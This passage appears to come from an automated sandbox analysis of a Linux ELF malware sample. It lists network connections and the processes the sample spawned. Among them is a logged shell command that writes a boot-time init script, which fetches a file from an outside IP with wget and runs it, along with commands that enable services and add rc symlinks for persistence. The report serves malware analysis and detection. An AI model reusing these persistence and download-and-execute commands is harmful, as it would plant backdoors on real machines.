                                          Dec 5, 2024 08:02:58.129261971 CET4251680192.168.2.23109.202.202.202
                                          Dec 5, 2024 08:03:10.927475929 CET43928443192.168.2.2391.189.91.42
                                          Dec 5, 2024 08:03:23.213746071 CET42836443192.168.2.2391.189.91.43
                                          Dec 5, 2024 08:03:29.356878996 CET4251680192.168.2.23109.202.202.202
                                          Dec 5, 2024 08:03:51.881733894 CET43928443192.168.2.2391.189.91.42

                                          System Behavior

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/tmp/x86_32.nn.elf
                                          Arguments:/tmp/x86_32.nn.elf
                                          File size:95984 bytes
                                          MD5 hash:c32c3d338238953b22589c540fd85e64

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/tmp/x86_32.nn.elf
                                          Arguments:-
                                          File size:95984 bytes
                                          MD5 hash:c32c3d338238953b22589c540fd85e64

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/tmp/x86_32.nn.elf
                                          Arguments:-
                                          File size:95984 bytes
                                          MD5 hash:c32c3d338238953b22589c540fd85e64

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/bin/sh
                                          Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/bin/sh
                                          Arguments:-
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/usr/bin/systemctl
                                          Arguments:systemctl enable custom.service
                                          File size:996584 bytes
                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/tmp/x86_32.nn.elf
                                          Arguments:-
                                          File size:95984 bytes
                                          MD5 hash:c32c3d338238953b22589c540fd85e64

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/bin/sh
                                          Arguments:sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/bin/sh
                                          Arguments:-
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/usr/bin/chmod
                                          Arguments:chmod +x /etc/init.d/system
                                          File size:63864 bytes
                                          MD5 hash:739483b900c045ae1374d6f53a86a279

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/tmp/x86_32.nn.elf
                                          Arguments:-
                                          File size:95984 bytes
                                          MD5 hash:c32c3d338238953b22589c540fd85e64

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/bin/sh
                                          Arguments:sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/bin/sh
                                          Arguments:-
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/usr/bin/ln
                                          Arguments:ln -s /etc/init.d/system /etc/rcS.d/S99system
                                          File size:76160 bytes
                                          MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/tmp/x86_32.nn.elf
                                          Arguments:-
                                          File size:95984 bytes
                                          MD5 hash:c32c3d338238953b22589c540fd85e64

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/bin/sh
                                          Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/tmp/x86_32.nn.elf
                                          Arguments:-
                                          File size:95984 bytes
                                          MD5 hash:c32c3d338238953b22589c540fd85e64

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/bin/sh
                                          Arguments:sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/bin/sh
                                          Arguments:-
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/usr/bin/chmod
                                          Arguments:chmod +x /etc/init.d/sh
                                          File size:63864 bytes
                                          MD5 hash:739483b900c045ae1374d6f53a86a279

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/tmp/x86_32.nn.elf
                                          Arguments:-
                                          File size:95984 bytes
                                          MD5 hash:c32c3d338238953b22589c540fd85e64

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/bin/sh
                                          Arguments:sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/bin/sh
                                          Arguments:-
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/usr/bin/mkdir
                                          Arguments:mkdir -p /etc/rc.d
                                          File size:88408 bytes
                                          MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/tmp/x86_32.nn.elf
                                          Arguments:-
                                          File size:95984 bytes
                                          MD5 hash:c32c3d338238953b22589c540fd85e64

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/bin/sh
                                          Arguments:sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/bin/sh
                                          Arguments:-
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/usr/bin/ln
                                          Arguments:ln -s /etc/init.d/sh /etc/rc.d/S99sh
                                          File size:76160 bytes
                                          MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/tmp/x86_32.nn.elf
                                          Arguments:-
                                          File size:95984 bytes
                                          MD5 hash:c32c3d338238953b22589c540fd85e64

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/tmp/x86_32.nn.elf
                                          Arguments:-
                                          File size:95984 bytes
                                          MD5 hash:c32c3d338238953b22589c540fd85e64

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/tmp/x86_32.nn.elf
                                          Arguments:-
                                          File size:95984 bytes
                                          MD5 hash:c32c3d338238953b22589c540fd85e64

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/tmp/x86_32.nn.elf
                                          Arguments:-
                                          File size:95984 bytes
                                          MD5 hash:c32c3d338238953b22589c540fd85e64

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/usr/lib/udisks2/udisksd
                                          Arguments:-
                                          File size:483056 bytes
                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/usr/sbin/dumpe2fs
                                          Arguments:dumpe2fs -h /dev/dm-0
                                          File size:31112 bytes
                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/usr/lib/udisks2/udisksd
                                          Arguments:-
                                          File size:483056 bytes
                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/usr/sbin/dumpe2fs
                                          Arguments:dumpe2fs -h /dev/dm-0
                                          File size:31112 bytes
                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/usr/lib/systemd/systemd
                                          Arguments:-
                                          File size:1620224 bytes
                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                          Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                          File size:22760 bytes
                                          MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/usr/libexec/gnome-session-binary
                                          Arguments:-
                                          File size:334664 bytes
                                          MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/bin/sh
                                          Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/usr/libexec/gsd-housekeeping
                                          Arguments:/usr/libexec/gsd-housekeeping
                                          File size:51840 bytes
                                          MD5 hash:b55f3394a84976ddb92a2915e5d76914

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/usr/bin/dash
                                          Arguments:-
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/usr/bin/rm
                                          Arguments:rm -f /tmp/tmp.XBu45Y3Wjt /tmp/tmp.7z05jTzkif /tmp/tmp.34WcYkzQMA
                                          File size:72056 bytes
                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/usr/bin/dash
                                          Arguments:-
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):07:02:48
                                          Start date (UTC):05/12/2024
                                          Path:/usr/bin/rm
                                          Arguments:rm -f /tmp/tmp.XBu45Y3Wjt /tmp/tmp.7z05jTzkif /tmp/tmp.34WcYkzQMA
                                          File size:72056 bytes
                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/usr/sbin/gdm3
                                          Arguments:-
                                          File size:453296 bytes
                                          MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/etc/gdm3/PrimeOff/Default
                                          Arguments:/etc/gdm3/PrimeOff/Default
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/usr/sbin/gdm3
                                          Arguments:-
                                          File size:453296 bytes
                                          MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/etc/gdm3/PrimeOff/Default
                                          Arguments:/etc/gdm3/PrimeOff/Default
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/usr/lib/udisks2/udisksd
                                          Arguments:-
                                          File size:483056 bytes
                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/usr/sbin/dumpe2fs
                                          Arguments:dumpe2fs -h /dev/dm-0
                                          File size:31112 bytes
                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/usr/lib/udisks2/udisksd
                                          Arguments:-
                                          File size:483056 bytes
                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/usr/sbin/dumpe2fs
                                          Arguments:dumpe2fs -h /dev/dm-0
                                          File size:31112 bytes
                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/usr/lib/udisks2/udisksd
                                          Arguments:-
                                          File size:483056 bytes
                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/usr/sbin/dumpe2fs
                                          Arguments:dumpe2fs -h /dev/dm-0
                                          File size:31112 bytes
                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/usr/lib/udisks2/udisksd
                                          Arguments:-
                                          File size:483056 bytes
                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/usr/sbin/dumpe2fs
                                          Arguments:dumpe2fs -h /dev/dm-0
                                          File size:31112 bytes
                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                          Start time (UTC):07:02:49
                                          Start date (UTC):05/12/2024
                                          Path:/usr/lib/udisks2/udisksd
                                          Arguments:-
                                          File size:483056 bytes
                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                          Start time (UTC):07:02:50
                                          Start date (UTC):05/12/2024
                                          Path:/usr/sbin/dumpe2fs
                                          Arguments:dumpe2fs -h /dev/dm-0
                                          File size:31112 bytes
                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                          Start time (UTC):07:02:50
                                          Start date (UTC):05/12/2024
                                          Path:/usr/lib/udisks2/udisksd
                                          Arguments:-
                                          File size:483056 bytes
                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                          Start time (UTC):07:02:50
                                          Start date (UTC):05/12/2024
                                          Path:/usr/sbin/dumpe2fs
                                          Arguments:dumpe2fs -h /dev/dm-0
                                          File size:31112 bytes
                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                          Start time (UTC):07:02:50
                                          Start date (UTC):05/12/2024
                                          Path:/usr/lib/udisks2/udisksd
                                          Arguments:-
                                          File size:483056 bytes
                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                          Start time (UTC):07:02:50
                                          Start date (UTC):05/12/2024
                                          Path:/usr/sbin/dumpe2fs
                                          Arguments:dumpe2fs -h /dev/dm-0
                                          File size:31112 bytes
                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4